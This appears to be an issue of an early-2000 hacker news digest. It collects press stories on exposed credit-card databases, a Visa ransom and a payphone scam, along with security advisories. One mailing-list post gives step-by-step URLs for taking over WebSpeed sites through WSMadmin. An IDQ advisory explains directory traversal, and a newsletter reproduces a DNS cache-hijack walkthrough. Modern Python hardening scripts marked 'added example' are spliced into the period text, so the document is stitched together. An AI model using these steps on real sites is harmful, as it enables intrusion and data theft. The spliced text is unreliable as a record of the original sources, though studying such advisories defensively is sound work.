This week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web — the databases were using the default user name and in some cases, no password.

These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response.

“From our point of view this is just unprofessionalism in a very high degree that’s not explainable,” Prokhorov said.

His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren’t looking to find security flaws, but rather stumbled on these.

“This is just a hole we passed by, an open door. Our people were amazed.”

But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures.

“This is a microcosm of what’s out there,” said Elias Levy of SecurityFocus.com. Levy’s site was the first to report the CD Universe break-in last weekend. “One could only imagine what they would have found if they were looking for problems.... The problem is fairly widespread, and what Anatoliy has found is a small snapshot.”

Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation.

The security flaws Prokhorov found involve more than just easy-to-steal credit cards.
At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers.

Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers — in each case, they were running Microsoft’s SQL Server software — or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.)

Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net — were all contacted 24 hours before this story so they could close the security hole.

While the flaws are obvious, assessing blame is a much more sticky business. There’s a mounting concern that small businesses are particularly vulnerable to attack; many don’t have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don’t deliver.

Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places “::$DATA” at the end of the page’s Web address. That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole.

But even without knowing that technique, an intruder could have entered the sites anyway — the username required for entering the database was the default “sa,” which stands for “system administrator”; the password was the name of the company.
“We used a developer, and obviously the developer didn’t take that flaw into consideration,” said a spokesperson for the sites. “The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn’t do, we didn’t hire a security company to come in and test our Web site.”

Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list.

“Make a condition of the contract that it has to pass scrutiny of another individual who tests the site,” Cooper recommended.

The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. “So a lot of people end up with a working site but not a secure site.”

The other three vulnerable sites MSNBC visited simply used “sa” as the username for their database, and no password.

Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated.

“The blame falls on more than one person. You can’t rush out to set up an e-commerce site regardless of how much you want to make money. ... Many people don’t give (security) a second thought,” he said.

One of the fundamental flaws in all these sites — and, experts say, in many other sites — is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it’s often kept on a computer in plain text — one step away from the Internet. While that’s more convenient, experts agree it’s a bad idea.
“My advice is, if nothing else, don’t store the data where it physically has access to the Web,” said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. “Take them off every night and make a sneakernet run.”

As for consumers, there isn’t much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank.

MSNBC’s Curtis Von Veh contributed to this story.

@HWA

30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by tom

It is alleged that a team of sophisticated professional electronic intruders have broken into twelve multinational companies and have issued ransom demands to prevent the release of stolen information. This report only names one of the companies in question, Visa, and says that Scotland Yard is investigating. (While it would appear that Visa has admitted to the intrusion we would like to know who the other companies are.)

The UK Times
http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999

January 16 2000 BRITAIN

Hacker gang blackmails firms with stolen files

Jon Ungoed-Thomas and Stan Arnaud

A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to £10m and is also suspected of hiring out its services.

Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator.
Visa confirmed last week that it had received a ransom demand last month, believed to have been for £10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI."

It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly £1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds.

"We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in."

Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland. Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company.

He has been interviewed by detectives and Visa security experts. It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future."

Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker.

Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system.
They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation.

The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files.

Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group."

@HWA

31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SUCK THIS!

From HNN http://www.hackernews.com/

contributed by deeeek

Telstra (Australian Telephone Company) has to upgrade 29,000 payphones due to fraud involving a drinking straw. The problem affects 80% of the pay phones installed since 1997. No information about exactly how the fraud was committed was given. (A Straw? Oh, there must be a text file on this somewhere.)

Fairfax IT
http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html

Scam forces Telstra to fix 29,000 pay phones

9:17 Friday 14 January 2000
AAP

TELSTRA is urgently modifying 80 per cent of its public pay phones after a scam was discovered involving a drinking straw and free phone calls around the world.

Telstra would have the 29,000 vulnerable phones rectified soon, Telstra's public affairs manager Michael Herskope said yesterday.

The Spanish-manufactured coin and phone card-operated Smart pay phone was phased into the Australian network from 1997.

The scam potentially cost Telstra millions of dollars in unlimited STD and ISD calls since then, but Telstra can only speculate.

"We have a rough idea, but that's not something we're really going to publicise,'' Herskope said.
The scam was made public on the front page of Albury-Wodonga's The Border Morning Mail yesterday.

The newspaper was told by perpetrators that the low-tech scam had been well known since the phones were introduced as part of a $100 million upgrade of the public phone national network. One source said some people may have learnt about it from the Internet.

The paper accompanied a man to three public phones chosen at random and observed him make free calls, including one to New York.

Telstra had initially dismissed the scam as a myth, the paper said.

But Herskope denied that Telstra only learnt of the fraud from the country newspaper.

"We've known about it for a little while,'' he said. "It's pretty hard to articulate weeks, days. I'm not sure how it was brought to our attention but it certainly was.''

He said rectifying the problem was a simple procedure. Without disclosing how the fraud was perpetrated, he said there was no design fault in the phone.

"This particular fault will be closed off very shortly,'' he said.

@HWA

32.0 Owning sites that run WebSpeed web db software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: win2k security advice mailing list.

From: George
To:
Sent: Friday, February 04, 2000 7:32 PM
Subject: Webspeed security issue leaves sites vulnerable

I reported this to Progress (maker of Webspeed) a month ago and they said they would fix it but since then I've not seen any fixes released. I also pondered whether or not to release this information because some rather large web databases use Webspeed but I do believe in full disclosure as the best security so here goes...

Webspeed is a website creation language used by some of the larger db based websites on the net. Version 3 comes with a java GUI configuration program. This configuration program has certain security setting options in it. One of which doesn't actually do anything. There is one option to turn off access to a utility called WSMadmin.
It's in the messenger section of the GUI config program. However checking or unchecking this option doesn't change anything. In fact to turn this feature off you have to hand edit the ubroker.properties file. Look for the following entries:

AllowMsngrCmds=1

and each time you find this set it =0 in each of the sections. This will disable the feature (you want to do this on the production server).

AllowMsngrCmds=0

Ok, now the exploit to show how serious an issue this is on the web. It's just a misconfiguration really but it's caused by a bug in the java config program (I tested the NT version but since the config program is java it may also affect other platforms)

Exploit:

go to search engines and search for "wsisa.dll", I used google 3rd page or further (first 3 pages are all junk)

Go to URL similar to http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm with your browser

change the url in the browser to http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin (note capitals are important)

click on the link "End Sessions Logging and Display Sessions Info" (note you may have to start logging first then stop it if they've never used the logging feature)

When you pick the End Sessions Logging choice it displays the log, find a statement in the log for the default service "Default Service = nameofservice"

back up one page (hit your back button)

type nameofservice into the Verify WebSpeed Configuration box and click the verify button.

If everything worked you now own their site. I won't explain how to use the utility but anyone familiar with this should know exactly how dangerous this is.

Geo.
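Since the GUI checkbox does not take effect, the only reliable check is against the file itself. The following is an added example, not Progress's code and not from Geo's post, of a Python audit for ubroker.properties: it lists every section whose AllowMsngrCmds is still 1 and can rewrite those lines to 0 while leaving everything else in the file untouched. The embedded file and its section names are a constructed sample, and the INI-style [section] / key=value layout it parses is assumed from the post's description of the file.

```python
"""Audit and harden AllowMsngrCmds in a WebSpeed ubroker.properties file.

Added example, not Progress's own code. Assumes the file consists of
INI-style [section] headers followed by key=value lines (as described in
the mailing-list post); the sample below is constructed, not a real
deployment file.
"""
import re

SAMPLE = """\
# constructed sample ubroker.properties, not a real deployment file
[UBroker]
    AllowMsngrCmds=1
    srvrStartupParam=-p web/objects/web-disp.p
[UBroker.WS]
    AllowMsngrCmds=1
[UBroker.WS.wsbroker1]
    AllowMsngrCmds=0
    brokerLogFile=wsbroker1.broker.log
[UBroker.WS.store]
    AllowMsngrCmds=1
[WebSpeed.Messengers]
    AllowMsngrCmds=1
"""

# [Section.Name] on a line of its own
_SECTION = re.compile(r"^\s*\[([^\]]+)\]\s*$")
# AllowMsngrCmds=<value>, capturing indentation and the value
_KEY = re.compile(r"^(\s*)AllowMsngrCmds\s*=\s*(\S*)\s*$")


def audit(text):
    """Return [(section, value), ...] for every AllowMsngrCmds entry whose
    value is not 0, in file order. An empty list means the messenger
    commands (and so WSMadmin) are disabled in every section."""
    section, findings = None, []
    for line in text.splitlines():
        m = _SECTION.match(line)
        if m:
            section = m.group(1)
            continue
        m = _KEY.match(line)
        if m and m.group(2) != "0":
            findings.append((section, m.group(2)))
    return findings


def harden(text):
    """Rewrite every non-zero AllowMsngrCmds line to 0, keeping indentation,
    line endings and all other lines byte-for-byte.
    Returns (new_text, number_of_lines_changed)."""
    out, changed = [], 0
    for line in text.splitlines(keepends=True):
        body = line.rstrip("\r\n")
        m = _KEY.match(body)
        if m and m.group(2) != "0":
            line = f"{m.group(1)}AllowMsngrCmds=0{line[len(body):]}"
            changed += 1
        out.append(line)
    return "".join(out), changed


if __name__ == "__main__":
    for section, value in audit(SAMPLE):
        print(f"[{section}] AllowMsngrCmds={value}  <- should be 0")
    fixed, n = harden(SAMPLE)
    print(f"{n} line(s) would be changed; remaining findings: {audit(fixed)}")
```

Run the audit against the production copy after every save from the GUI configuration program, since the post reports the GUI does not write this setting; review the diff that harden produces before replacing the file, and re-run audit on the result so a section that was missed does not stay open.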
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

33.0 Cerberus Information Security Advisory (CISADV000202)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cerberus Information Security Advisory (CISADV000202)

http://www.cerberus-infosec.co.uk/advisories.html

Released : 2nd February 2000
Name : IDQ
Affected Systems : Microsoft Windows NT 4 running Internet Information Server 3 or 4
Issue : Attackers can access files outside of the web virtual directory system
Author : David Litchfield (mnemonix@globalnet.co.uk)

Description
*********

Any web site running Internet Information Server 3 or 4 and using Internet Data Query files to provide search functionality on the site may be exposed. IIS also comes with some sample IDQ scripts that are vulnerable so any website with these sample files left on are at risk. Using these IDQ scripts or even custom scripts it is possible to break outside of the web virtual root and gain unauthorized access to files, such as log files and in certain cases the backup version of the Security Accounts Manager (sam._) It does require for the attacker to know the path to the file, for the file to be on the same logical disk drive as the IDQ file and for ACL to allow read access to the anonymous Internet account or the Everyone/guests group.

Details
*****

The extent of this security hole depends upon whether the recent "webhits" patch has been installed. See http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

If the patch has been installed there is still a vulnerability - however, those that have not installed this patch are most at risk. Microsoft are re-releasing this advisory and the updated patch. Please note that Windows 2000 does not seem to be vulnerable to this.
Cerberus' vulnerability scanner, CIS, has now been updated to check for this issue. For those that already have a copy of the scanner you can download the updated module from http://www.cerberus-infosec.co.uk/webscan.dll - however those that do not yet have the scanner, if you would like a copy please go to http://www.cerberus-infosec.co.uk/ and follow the Cerberus Internet Scanner link on the frontpage.

If the "webhits" patch HAS NOT been installed
************************************

Any idq file that resolves remote user input for any part of the template file is dangerous.

eg:

CiTemplate = %TemplateName%

The ISAPI application that deals with IDQ queries is idq.dll and it will follow double dots in paths to template files, meaning an attacker can break out of the web root. If the idq file appends .htx to the CiTemplate

eg:

CiTemplate=/iissamples/issamples/%TemplateName%.htx

some may think this will limit attackers to viewing only .htx files. Not so. Quoting from the Index Server documentation (/iishelp/ix/htm/ixidqhlp.htm), "Index Server does not support physical paths longer than the Windows NT shell limit (260 characters)." Due to this limit it is possible to append lots of spaces onto the name of the file we want to read and thereby pushing the .htx out of the buffer and we're served back the file.

IDQ files known to be at risk in one way or another:

prxdocs/misc/prxrch.idq
iissamples/issamples/query.idq
iissamples/exair/Search/search.idq
iissamples/exair/Search/query.idq
iissamples/issamples/fastq.idq

There may be more.

If the "webhits" patch HAS been installed
*******************************

Machines that have had the patch installed will only be vulnerable if the IDQ file does not specify a .htx extension

eg:

CiTemplate = %TemplateName%

and

CiTemplate = /somedir/otherdir/%TemplateName%

are vulnerable whereas

CiTemplate = /somedir/otherdir/%TemplateName%.htx

is not vulnerable.

Solution:
*******

Review your IDQ files to determine if you are at risk.
If so edit them and use hardcoded template files.

eg

CiTemplate=%TemplateName%

to

CiTemplate=/your-virtual-directory/your-htx-file.htx

and then edit your search form to reflect this change.

Remove any sample files from the system - not just idq files.

Apply the updated patch.

About Cerberus Information Security, Ltd
********************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services.

Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

------------------------------------------------------------------------
Delivery co-sponsored by Trend Micro, Inc.: http://www.antivirus.com.
ScanMail for Microsoft Exchange
* Stops viruses from spreading through Exchange Servers.
* Eliminates viruses from email in real time, even unknown macro viruses * Filters spam (unsolicited junk email). * Sends customized virus warning messages to specific parties and admins * Remote installation and management via web or ScanMail's Windows GUI ------------------------------------------------------------------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 34.0 Security Focus Newsletter #26 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Security Focus Newsletter #26 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Multiple Vendor BSD /proc File Sytem Vulnerability 2. DNS TLD & Out of Zone NS Domain Hijacking 3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability 4. VMware Symlink Vulnerability 5. HP Path MTU Discovery DoS Vulnerability 6. Microsoft East Asian Word Conversion Vulnerability 7. NT RDISK Registry Enumeration File Vulnerability 8. Qualcomm qpopper 'LIST' Buffer Overflow Vulnerability 9. NT Index Server Directory Traversal Vulnerability III. PATCH UPDATES 1. Vulnerability Patched: Qualcomm qpopper 'LIST' Buffer Overflow 2. Vulnerability Patched: NT Index Server Directory Traversal 3. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 4. Vulnerability Patched: Multiple Vendor BSD /proc File Sytem 5. Vulnerability Patched: Inter7 vpopmail (vchkpw) Buffer Overflow 6. Vulnerability Patched: NT RDISK Registry Enumeration File 7. Vulnerability Patched: Microsoft East Asian Word Conversion 8. Vulnerability Patched: Multiple Vendor BSD make /tmp Race IV. SECURITYFOCUS.COM TOP 6 NEWS ARTICLES 1. Outpost Leaves Data Unguarded (Mon Jan 24 2000) 2. Japan Says to Seek U.S. Help to Deal With Hackers (Tue Jan 25 2000) 3. Task Force Battles Online Criminals (Wed Jan 26 2000) 4. Smart card 'inventor' lands in jail (Thu Jan 27 2000) 5. 
Visa acknowledges cracker break-ins (Fri Jan 28 2000) 6. A Year Of Mass-Mailing Viruses (Fri Jan 28 2000) V. INCIDENTS SUMMARY 1. Got scanned again (Thread) 2. Unusual scan pattern (Thread) 3. Possible Probe = Possible Malfunction (Thread) 4. No Idea (Thread) 5. PC Anywhere client seems to probe class C of connected networks (Thread) 6. unapproved AXFR (Thread) 7. Connect thru PIX & ports 1727, 2209, 9200 (Thread) 8. Anti-Death Penalty (Thread) 9. Strange DNS/TCP activity (Thread) 10. eri? (Thread) 11. source port 321 (Thread) 12. Korea (again) (Thread) 13. BOGUS.IvCD File (Thread) 14. port 768 (Thread) 15. Extrange named messages (Thread) 16. Probes to tcp 2766 ('System V Listner') (Thread) 17. Possible attempt at hacking? (Thread) 18. DNS update queries: another sort of suspicious activity. (Thread) VI. VULN-DEV RESEARCH LIST SUMMARY 1. Shadow (Thread) 2. things to break.. (Thread) 3. HTTP scanners? (summary, long) (Thread) 4. CGI insecurities (Thread) 5. ICQ Pass Cracker. (Thread) 6. File Share Vacuum (Thread) 7. IIS4.0 .htw vulnerability (Thread) 8. Napster a little insecure? (Thread) 9. distributed.net and seti@home (Thread) VII. SECURITY JOBS Seeking Employment: 1. Prashant Vijay (Summer Internship) Seeking Staff: 1. Security Research Engineer (Atlanta, Ga) 2. Practice Manager w/PKI experience NYC, Philly or DC) 3. Lead Security Engineer - Bay Area/San Jose 4. Senior security engineers - Bay Area/San Jose 5. Virus coder wanted (San Antonio, TX) 6. Junior Security Engineers Needed (Maryland) VIII. SECURITY SURVEY RESULTS IX. SECURITY FOCUS TOP 6 TOOLS 1. ShadowScan 1.00.093 (Windows 95/98 and Windows NT) 2. SecurityFocus.com Pager (Win95/98/NT) 3. lidentd 1.0p1 (Linux) 4. Cgi Sonar 1.0 (any system supporting perl) 5. Logcheck 1.1.1 (BSDI, Digital UNIX/Alpha, FreeBSD, HP-UX, Linux, NetBSD, OpenBSD, Solaris and SunOS) 6. Secret Sharer 1.0 1.0 (Windows 95/98) X. SPONSOR INFORMATION - CORE SDI http://www.core-sdi.com XI. SUBSCRIBE/UNSUBSCRIBE INFORMATION I. 
I.   INTRODUCTION
-----------------

Welcome to the SecurityFocus.com 'week in review' newsletter issue 26 for the
time period of 2000-01-24 to 2000-01-30, sponsored by CORE SDI.

CORE SDI is an international computer security research and development
company. Its clients include 3 of the Big 5 chartered accountant firms, for
whom CORE SDI develops customized security auditing tools, as well as several
notable computer security product vendors, such as Network Associates. In
addition to providing 'consultant to the consultant' services, CORE also
performs risk assessment and security infrastructure consulting for a large
number of government and Fortune 500 companies in both North and Latin
America.

http://www.core-sdi.com

II.  BUGTRAQ SUMMARY 2000-01-24 to 2000-01-30
---------------------------------------------

1. Multiple Vendor BSD /proc File System Vulnerability
BugTraq ID: 940
Remote: No
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/940
Summary:

Certain BSD derivative operating systems use an implementation of the /proc
filesystem which is vulnerable to attack from malicious local users. This
attack will gain the user root access to the host.

The proc file system was originally designed to allow easy access to
information about processes (hence the name). Its typical benefit is quicker
access to process memory and hence more streamlined operations. As noted
previously, certain implementations have a serious vulnerability. In short,
the vulnerability is that local users may manipulate processes, on systems
which use /proc, to gain root privileges. The full details are covered at
length in the advisory attached to the 'Credit' section of this vulnerability
entry.

2. DNS TLD & Out of Zone NS Domain Hijacking
BugTraq ID: 941
Remote: Yes
Date Published: 2000-01-23
Relevant URL:
http://www.securityfocus.com/bid/941
Summary:

A vulnerability exists in the mechanism used by DNS, in general, to determine
the name servers associated with TLDs (top level domains). DNS is built upon
levels of trust, and by exploiting single points of failure in this trust
system, it becomes possible for an attacker to convince a caching nameserver
that allows recursion through it that the root server for a given TLD is
something other than what it actually is. By performing these cache attacks
consecutively, it could be possible for an attacker to entirely take over
name service for any given domain.

The vulnerability is actually not specific to TLDs. The same attack can be
used to hijack any domain which has out of zone NS records, if any of the
servers that act as the name server for the out of zone domain can be
compromised.

The simplest explanation was presented in the example provided by its
discoverer, Dan Bernstein, on the Bugtraq mailing list, on January 23, 2000:

"Suppose an attacker can make recursive queries through your cache. Let me
emphasize that this does not mean that the attacker is one of your beloved
users; many programs act as DNS query-tunneling tools. Suppose the attacker
is also able, somehow, to take over ns2.netsol.com. This isn't one of the
.com servers, but it's a name server for the gtld-servers.net domain.

Here's what happens:

(1) The attacker asks your cache about z.com. Your cache contacts (say)
k.root-servers.net, which provides a referral:

    com NS j.gtld-servers.net (among others)
    j.gtld-servers.net A 198.41.0.21

These records are cached.

(2) The attacker asks your cache about z.gtld-servers.net. Your cache
contacts (say) f.root-servers.net, which provides a referral:

    gtld-servers.net NS ns2.netsol.com (among others)
    ns2.netsol.com A 207.159.77.19

These records are cached.

(3) The attacker takes over ns2.netsol.com.

(4) The attacker asks your cache about zz.gtld-servers.net. Your cache
contacts ns2.netsol.com, and the attacker answers:

    zz.gtld-servers.net CNAME j.gtld-servers.net
    j.gtld-servers.net A 1.2.3.4

These records are cached, wiping out the obsolete j glue.

(5) A legitimate user asks your cache about yahoo.com. Your cache contacts
j.gtld-servers.net, and the attacker answers:

    yahoo.com A 1.2.3.4

The user contacts yahoo.com at that address."

The attack offered requires that an attacker be able to compromise the
operation of the DNS server running on, in this case, ns2.netsol.com,
although this is not the only server that could potentially be used to
launch an attack of this style. The author further indicates that there are
in excess of 200 servers that could be used to manipulate resolution of all
the .COM domains.

3. Inter7 vpopmail (vchkpw) Buffer Overflow Vulnerability
BugTraq ID: 942
Remote: Yes
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/942
Summary:

Vpopmail (vchkpw) is a free GPL software package built to help manage virtual
domains and non-/etc/passwd email accounts on Qmail mail servers. This
package is developed by Inter7 (referenced in the 'Credit' section) and is
not shipped, maintained or supported by the main Qmail distribution. Certain
versions of this software are vulnerable to a remote buffer overflow attack
in the password authentication of vpopmail.

4. VMware Symlink Vulnerability
BugTraq ID: 943
Remote: No
Date Published: 2000-01-21
Relevant URL:
http://www.securityfocus.com/bid/943
Summary:

VMware is software that runs multiple virtual computers on a single PC, at
the same time, without partitioning or rebooting. Certain versions of the
VMware for Linux product do not perform /tmp file sanity checking and create
files in the /tmp directory which will follow symlinks. This may be used by a
malicious local user to overwrite any file (with log data) which falls within
the write permissions of the user ID which VMware executes as. Typically this
is root. This attack will most likely result in a denial of service and not
a root level compromise.

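The out of zone NS dependency described under item 2 above can be audited mechanically. The Python below is an added illustration, not part of the newsletter and not any resolver's code: it walks a constructed delegation table (modelled on the host names Bernstein uses, not a live DNS snapshot) and lists every server that resolution of a domain transitively trusts, flagging each delegation whose server name lies outside the zone it serves. The point it makes is that a host such as ns2.netsol.com, which never appears in example.com's own delegation chain, still ends up in the set of servers whose compromise would redirect example.com.

```python
"""Trust-dependency audit for a DNS delegation chain.

Added example, not from the newsletter or any resolver. DELEGATIONS is
constructed sample data: zone -> host names of its authoritative servers.
"""
from collections import deque

DELEGATIONS = {
    ".": ["k.root-servers.net"],
    "root-servers.net": ["k.root-servers.net"],
    "net": ["j.gtld-servers.net"],
    "com": ["j.gtld-servers.net"],
    "gtld-servers.net": ["ns2.netsol.com"],   # out of zone: lives in netsol.com
    "netsol.com": ["ns1.netsol.com"],
    "example.com": ["ns1.example.com"],       # constructed victim domain
}


def parent_zone(name):
    """'example.com' -> 'com', 'com' -> '.', '.' -> None."""
    if name == ".":
        return None
    return name.partition(".")[2] or "."


def zone_of(host):
    """Closest zone in DELEGATIONS that contains this server's own name,
    i.e. the zone whose servers hand out the A record for `host`."""
    zone = parent_zone(host)
    while zone not in DELEGATIONS and zone != ".":
        zone = parent_zone(zone)
    return zone


def in_zone(host, zone):
    """Root servers count as in-zone (their addresses come from root hints);
    otherwise a server is in-zone only if its name sits inside the zone it
    serves, so that the parent's glue is authoritative for it."""
    return zone == "." or host == zone or host.endswith("." + zone)


def trust_dependencies(domain):
    """Return {server_host: [zones it serves]} for every server that a
    resolver can be made to trust while resolving `domain`: the domain's own
    servers, every ancestor zone's servers, and, recursively, the servers of
    whatever zone each of those server names lives in."""
    served = {}
    seen, pending = set(), deque([domain])
    while pending:
        zone = pending.popleft()
        if zone in seen:
            continue
        seen.add(zone)
        parent = parent_zone(zone)
        if parent is not None:
            pending.append(parent)            # the delegating zone is trusted too
        for host in DELEGATIONS.get(zone, []):
            served.setdefault(host, set()).add(zone)
            pending.append(zone_of(host))     # where this server's A record lives
    return {host: sorted(zones) for host, zones in served.items()}


def out_of_zone_dependencies(domain):
    """(zone, server) pairs in the trust chain where the server's name is
    outside the zone it serves: each one is a hijack path of the kind the
    advisory describes, because a different zone vouches for the address."""
    pairs = []
    for host, zones in trust_dependencies(domain).items():
        for zone in zones:
            if not in_zone(host, zone):
                pairs.append((zone, host))
    return sorted(pairs)


if __name__ == "__main__":
    for zone, host in out_of_zone_dependencies("example.com"):
        print(f"{zone} is served by out-of-zone host {host}, "
              f"whose address is vouched for by {zone_of(host)}")
```

Run against the sample table, the audit reports that com depends on j.gtld-servers.net (vouched for by gtld-servers.net) and that gtld-servers.net depends on ns2.netsol.com (vouched for by netsol.com), so both netsol.com servers land in example.com's trust set. Replacing DELEGATIONS with NS data pulled for your own zones turns this into a quick measure of how many third-party servers your domain's resolution actually rests on.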
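The /tmp problem under item 4 has a standard fix: create the file atomically under a name nobody else can plant in advance, and never open an existing path by name with a privileged user ID. The Python below is an added example, not VMware's code. It runs the vulnerable pattern and the hardened one side by side inside a throw-away directory with a constructed symlink, so the effect can be seen without touching the real /tmp.

```python
"""Symlink-safe file creation in a world-writable directory.

Added example, not VMware's code. demo() builds a constructed scenario in a
temporary directory: a symlink sits where the program expects its log file.
"""
import os
import tempfile


def naive_append(path, data):
    """The vulnerable pattern: open a predictable name and append. If `path`
    is a symlink planted by another user, the write lands on its target,
    with the privileges of whoever runs this code."""
    with open(path, "a") as f:
        f.write(data)


def safe_create(path, data):
    """Hardened: create the file atomically, refuse if anything already
    exists at that name, and do not follow a symlink. Raises OSError
    (FileExistsError for a pre-existing name or link) instead of writing."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def safe_unique(directory, data):
    """Preferred form: mkstemp picks an unpredictable name and creates it
    with O_EXCL and mode 0600, so there is no name to pre-plant at all."""
    fd, path = tempfile.mkstemp(prefix="log-", dir=directory)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo():
    """Returns (target contents after the naive write, whether safe_create
    refused the planted link, whether the mkstemp file holds the data)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "victim-file")        # constructed victim
        link = os.path.join(d, "vmware.log")            # the expected log name
        with open(target, "w") as f:
            f.write("original\n")
        os.symlink(target, link)                        # the planted link

        naive_append(link, "log data\n")                # follows the link
        with open(target) as f:
            clobbered = f.read()

        try:
            safe_create(link, "log data\n")
            refused = False
        except OSError:
            refused = True

        unique = safe_unique(d, "log data\n")
        with open(unique) as f:
            unique_ok = f.read() == "log data\n"
        return clobbered, refused, unique_ok


if __name__ == "__main__":
    print(demo())
```

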